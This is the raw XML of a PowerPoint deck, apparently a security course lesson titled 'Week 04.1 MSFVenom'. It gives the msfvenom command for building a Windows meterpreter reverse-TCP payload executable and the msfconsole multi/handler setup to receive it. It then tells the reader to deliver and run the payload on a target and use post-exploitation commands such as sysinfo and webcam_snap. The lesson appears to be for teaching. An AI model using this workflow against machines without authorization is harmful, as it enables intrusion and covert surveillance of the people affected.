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93" r:id="rId3"/>
    <p:sldId id="295" r:id="rId4"/>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="297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7030A0"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="6600CC"/>
    <a:srgbClr val="9900FF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73993" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65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FD2A-3BD9-47D5-8140-4EF130A285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7715-0868-404E-8644-97C68A166EF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94892F8B-600D-47EF-AC66-E0751608FF68}" type="parTrans" cxnId="{5C1F8D8F-79E4-4BF7-B26B-5EBCD5FEE337}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6382B46-CC17-4E27-B98E-A1D580D1BD25}" type="sibTrans" cxnId="{5C1F8D8F-79E4-4BF7-B26B-5EBCD5FEE337}">
      <dgm:prSet/>
      <dgm:spPr/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C8910915-8044-40B6-BEDD-C423EB35FBE1}" type="pres">
      <dgm:prSet presAssocID="{7617FD2A-3BD9-47D5-8140-4EF130A28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79A0-B3E4-4648-AEC6-0E1A087810C4}" type="pres">
      <dgm:prSet presAssocID="{058D7715-0868-404E-8644-97C68A166EF1}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1" custScaleX="100196" custScaleY="100000" custLinFactNeighborY="-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8D8F-79E4-4BF7-B26B-5EBCD5FEE337}" srcId="{7617FD2A-3BD9-47D5-8140-4EF130A285A8}" destId="{058D7715-0868-404E-8644-97C68A166EF1}" srcOrd="0" destOrd="0" parTransId="{94892F8B-600D-47EF-AC66-E0751608FF68}" sibTransId="{D6382B46-CC17-4E27-B98E-A1D580D1BD25}"/>
    <dgm:cxn modelId="{5543EB30-E39F-40F6-A49E-00A93AC51021}" type="presOf" srcId="{058D7715-0868-404E-8644-97C68A166EF1}" destId="{4A6479A0-B3E4-4648-AEC6-0E1A087810C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{12C3A102-A748-4B70-9AC8-A8607041E98B}" type="presOf" srcId="{7617FD2A-3BD9-47D5-8140-4EF130A285A8}" destId="{C8910915-8044-40B6-BEDD-C423EB35FBE1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3C67CD81-5FB2-45F7-BF25-EB54D7D656CD}" type="presParOf" srcId="{C8910915-8044-40B6-BEDD-C423EB35FBE1}" destId="{4A6479A0-B3E4-4648-AEC6-0E1A087810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79A0-B3E4-4648-AEC6-0E1A087810C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="11893" y="0"/>
          <a:ext cx="12168213" cy="33322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460" tIns="632460" rIns="632460" bIns="632460" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="7378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109492" y="97599"/>
        <a:ext cx="11973015" cy="313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756B6-E331-4322-AA4F-3494547E4955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E22A-511F-44AA-9EED-3969D58F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D04-6255-49A7-84E1-F737BF3D4A0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61836"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-1" y="0"/>
          <a:ext cx="12192001" cy="33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381001"/>
            <a:ext cx="12192000" cy="203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3488513"/>
            <a:ext cx="1201782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/>
              <a:t>Week </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11500" smtClean="0"/>
              <a:t>04.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="11500" smtClean="0"/>
              <a:t>MSFVenom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0857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MSFVenom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it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" smtClean="0"/>
              <a:t>command line instance of Metasploit used to generate a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>payload creates a backdoor to a target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="44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621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MSFVenom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smtClean="0"/>
              <a:t>msfvenom – h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Helm menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>msfvenom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" smtClean="0"/>
              <a:t>help-formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>shows the format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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36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MSFVenom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smtClean="0"/>
              <a:t>Create a payload</a:t>
            </a:r>
          </a:p>
          <a:p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msfvenom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-p windows/meterpreter/reverse_tcp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LHOST</a:t>
            </a:r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=&lt;local host&gt; LPORT=5000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-f exe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payload.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>Local Host: your Kali machine IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>LPORT: choose any port. Pick a high number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9514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MSFVenom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6" y="1836776"/>
            <a:ext cx="1184445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4800" smtClean="0"/>
              <a:t>Open msfconsole and start the handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="300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exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr 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set LHOST &lt;your kali machine IP address&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr 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set LPORT &lt;the port you set on the payload. (5000)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr 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endParaRPr lang="en-US" sz="4800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" smtClean="0"/>
              <a:t>Get your payload to the target machine and execute it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" smtClean="0"/>
              <a:t>go back to your Kali and wait for the meterpreter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15941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smtClean="0"/>
              <a:t>Browse Around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</a:p>
          <a:p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sysinfo</a:t>
            </a:r>
          </a:p>
          <a:p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webcam_snap</a:t>
            </a:r>
          </a:p>
          <a:p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408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140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MSFVenom</vt:lpstr>
      <vt:lpstr>MSFVenom</vt:lpstr>
      <vt:lpstr>MSFVenom</vt:lpstr>
      <vt:lpstr>MSFVenom</vt:lpstr>
      <vt:lpstr>Browse Around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rsuzuki</dc:creator>
  <cp:lastModifiedBy>General Grievous</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-09T18:30:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-30T04:05:26Z</dcterms:modified>
</cp:coreProperties>
</file>